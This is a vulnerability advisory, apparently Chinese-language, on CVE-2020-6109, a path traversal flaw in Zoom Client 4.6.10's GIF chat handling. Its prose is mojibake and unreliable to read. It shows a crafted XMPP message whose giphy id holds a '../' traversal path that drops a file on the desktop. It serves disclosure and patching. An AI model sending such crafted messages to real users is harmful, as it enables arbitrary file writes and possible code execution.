CVE-2020-6109 | ZOOM¿Í»§¶Ëõè¾¶±éÀú·ì϶¹«¸æ
°ä²¼¹¦·ò 2020-06-050x00 ·ì϶¸ÅÊö
|
CVE ID |
CVE-2020-6109 |
ʱ ¼ä |
2020-06-04 |
|
Àà ÐÍ |
DT |
µÈ ¼¶ |
¸ßΣ |
|
Ô¶³ÌÀûÓà |
ÊÇ |
Ó°ÏìÁìÓò |
Zoom Client 4.6.10 |
0x01 ·ì϶ÏêÇé
Zoom ClientÊÇÃÀ¹úZoom¹«Ë¾µÄÒ»¿îÖ§³Ö¶àÖÔì½Ì¨µÄÊÓÆµ»áÒé¿Í»§¶ËÀûÓ÷¨Ê½¡£
CVE-2020-6109ÔÚZoom Client°æ±¾4.6.10ÖдæÔÚ¿ÉÀûÓõÄõè¾¶±éÀú·ì϶£¬¸Ã·ì϶ÔÚ´¦ÖÃÔ̺¬¶¯»GIFµÄÐÂÎÅʱ¡£ÌØÔìµÄ̸ÌìÐÂÎÅ¿ÉÄܵ¼ÖÂËÁÒâÎļþдÈ룬¿ÉÄÜ»á½øÒ»²½ÀÄÓøÃÎļþÒÔʵÏÖËÁÒâ´úÂëÖ´ÐС£¹¥»÷Õß±ØÒªÏòÖ¸±êÓû§»ò×é·¢ËÍÌØÔìÐÂÎÅÄÜÁ¦´¥·¢´Ë·ì϶¡£
ZoomµÄ̸ÌìÖ°ÄܳÉÁ¢ÔÚXMPP³ß¶ÈµÄ»ù´¡ÉÏ£¬²¢ÓµÓÐÖ§³ÔìäËûÀ©´óÖ°ÄÜ¡£ÕâЩÀ©´óÖ®Ò»Ö§³ÖÔÚ̸ÌìÖÐÔ̺¬¶¯»GIFÐÂÎŵÄÖ°ÄÜ¡£Ìṩ´ËÖ°Äܲ¢ÒÀÀµGiphy·þÎñ¡£µ±¿Í»§¶ËÊÕµ½´øÓдËgiphyÀ©´óÃûµÄXMPPÐÂÎÅʱ£¬½«ÅúʾÆä½Ó¼ûÖ¸¶¨µÄHTTP URL²¢»ñÈ¡GIFÎļþ·¢Ë͸øÓû§¡£´ËÀàXMPPÐÂÎŵÄʾÀýÈçÏ£º
<message from='source@xmpp.zoom.us' to='destination@xmpp.zoom.us' id='random' type='chat'>
<body>User Name sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body>
<thread>RANDOM</thread>
<active xmlns='http://jabber.org/protocol/chatstates'/>
<sns>
<format>%1$@ sent you a picture</format>
<args>
<arg>User Name</arg>
</args>
</sns>
<giphy id='filename' url='image_url' tags='congrats'>
<pcInfo url='image_url_for_pc_display' size='10'/>
<mobileInfo url='image_url_for_mobile_display' size='10'/>
<bigPicInfo url='image_url_for_full_size_display' size='10'/>
</giphy>
<zmext expire_t='timestamp' prev='timestamp' t='timestamp'>
<from n='User Name' e='email' res='ZoomChat_pc'/>
<to/>
<visible>true</visible>
<msg_feature>0</msg_feature>
</zmext>
</message>
ÉÏÃæµÄXML´úÂëÖÐÓÐÁ½¸öÖµ±ØÒª¹Ø×¢¡£Ê×ÏÈ£¬¸Ãgiphy±êÇ©Ô̺¬Èý¸öÖ¸±êURL£¬ÕâЩURLÓ¦¸ÃÖ¸ÏòGiphyµÄ·þÎñÆ÷¡£¼ò¶ÌµÄ²âÊÔÅú×¢£¬Ã»ÓÐÖ´ÐÐÖ¸±êURLµÄÑéÖ¤£¬²¢ÇÒ¿Í»§¶Ë½«×ñÑÖ¸¶¨µÄURL£¬Ô̺¬ËÁÒâ·þÎñÆ÷¡£Ö¸¶¨×Ô½ç˵URLʱ£¬Äܹ»¹Û²ìµ½À´×Ô¿Í»§¶ËµÄHTTPÏνӣº
GET /test.gif HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (ZOOM.Mac 10.14.6 x86)
Accept: */*
Cookie: srid=SaaSbeeTestMode00123578;
ZM-CAP: 2535978022733895607,164
ZM-PROP: Mac.Zoom
ZM-NSGN:2,zVM1hmoFnK2kx8t/KEifN7IAXRSE/CnqolsM0zV6ess=,1586812854000
Ó¦¸ÃÖ¸³öµÄÊÇ£¬Ö»¹ÜÒÔÉÏÒªÇóÖÐûÓÐÑéÖ¤cookie£¬µ«ÈÔÓÐ×ã¹»µÄÐÅϢй¶Ψһ±êʶµÄ¿Í»§¶Ë¡£±êÍ·ZM-NSGNÔ̺¬¾¹ý¹þÏ£´¦ÖúͱàÂëµÄΨһ¿Í»§¶ËÉ豸ID¡£
²âÊÔ·¢ÏÖ¼´±ãgiphyÀ©´óÃû½öÏÔʾGIFͼÏñ£¬ËüÒ²½«ÇáËÉÏÔʾºÍÔ¤ÀÀÆäËûͼÏñÀàÐÍ¡£ÕâÔ̺¬PNGºÍJPEGÎļþÌåʽ¡£
´ËÐÂÎÅXML´úÂëÖеĵڶþ¼þÓÐȤµÄÊÂÊÇ£¬ÏóÕ÷µÄidÊôÐÔgiphyÖ±½ÓÓë¿Í»§¶Ë»º´æÔÚ´ÅÅÌÉϵÄͼÏñÎļþÃûÓйØÁª¡£»»¾ä»°Ëµ£¬¿Í»§¶ËÀûÓ÷¨Ê½½«Ê¹ÓôËÖ¸¶¨µÄID½«Îļþ±£Áôµ½´ÅÅÌÒÔ¹©½«À´ÏÔʾ¡£Äܹ»ÌṩËÁÒâÎļþÃû£¬²¢ÇÒÎļþ½«´æ´¢ÔÚdataZoom×°ÖÃĿ¼ÏÂĿ¼ÖеĿÉÔ¤²âµØÎ»¡£
ÕæÕýµÄ·ì϶ÔÚÓÚÕâÑùµÄÇé¿ö£¬¼´ÎļþÃûûÓÐÒÔÈκη½Ê½É¾³ý£¬²¢ÔÊÐíĿ¼±éÀú¡£ÕâÒâζ×ÅÏóÕ÷µÄÌØÔìidÊôÐÔgiphyÄܹ»Ô̺¬Ò»¸öÌØÊâÎļþõè¾¶£¬¸Ãõè¾¶½«ÔÚZoomµÄ×°ÖÃĿ¼֮±í²¢ÇÒÏÖʵÉÏÔÚµ±Ç°Óû§¿ÉдµÄÈκÎĿ¼ÖÐдÈëÎļþ¡£ÒÔÏÂÅú¸ÄµÄmessage˵ÁËÈ»ÕâÖÖ¿ÉÄÜÐÔ£º
<message from='source@xmpp.zoom.us' to='destination@xmpp.zoom.us' id='random' type='chat'>
<body>User Name sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body>
<thread>RANDOM</thread>
<active xmlns='http://jabber.org/protocol/chatstates'/>
<sns>
<format>%1$@ sent you a picture</format>
<args>
<arg>User Name</arg>
</args>
</sns>
<giphy id='../../../../../../Desktop/mallicious_file.exe' url='image_url' tags='congrats'>
<pcInfo url='image_url_for_pc_display' size='10'/>
<mobileInfo url='image_url_for_mobile_display' size='10'/>
<bigPicInfo url='image_url_for_full_size_display' size='10'/>
</giphy>
<zmext expire_t='timestamp' prev='timestamp' t='timestamp'>
<from n='User Name' e='email' res='ZoomChat_pc'/>
<to/>
<visible>true</visible>
<msg_feature>0</msg_feature>
</zmext>
</message>
Zoom¿Í»§¶Ë»á½«×Ö·û´®¸½¼Ó_BigPic.gifµ½Ö¸¶¨µÄÎļþÃûÕâÒ»ÊÂʵÄܹ»²¿ÃÅ»º½â´Ë·ì϶¡£ÕâÑùÄܹ»Ô¤·À¹¥»÷Õß´´½¨ÓµÓÐËÁÒâÀ©´óÃûµÄ¿ÉÆëÈ«½ÚÔìµÄÎļþ¡£ÈôÊǹ¥»÷ÕßÑ¡ÔñÁË.gifÀ©´óÃû£¬ÒÔÉÏÄÚÈÝÈÔ½«Ê¹ÓÃÎļþÃû½«ËÁÒâÄÚÈݵÄÎļþ¸éÖõ½µ±Ç°Óû§µÄ×ÀÃæÉÏ¡£ÎļþµÄÄÚÈݲ»½öÏÞÓÚͼÏñ£¬»¹¿ÉÄÜÔ̺¬¿ÉÖ´ÐдúÂë»ò¾ç±¾£¬ÕâЩ´úÂë»ò¾ç±¾¿ÉÄܱ»ÀÄÓÃÒÔÔ®ÊÖÀûÓÃÁíÒ»¸ö·ì϶¡£
´Ë±í¿ÉÄÜ»áÔÚWindowsϵͳÉÏ´´½¨¿ÕÎļþµÄËÁÒâÀ©´óÃû¡£
0x02 ´ëÖý¨Òé
Ŀǰ³§ÉÌÒѰ䲼4.6.12°æ±¾ÒÔ½¨¸´·ì϶£¬ÏÂÔØµØÖ·£º
https://zoom.us/
0x03 ÓйØÐÂÎÅ
https://securityaffairs.co/wordpress/104249/hacking/zoom-security-flaws.html
0x04 ²Î¿¼Á´½Ó
https://talosintelligence.com/vulnerability_reports/TALOS-2020-1055
0x05 ¹¦·òÏß
2020-04-16 ×êÑÐÈËÔ±Åû¶
2020-06-04 VSRC°ä²¼·ì϶¹«¸æ


¾©¹«Íø°²±¸11010802024551ºÅ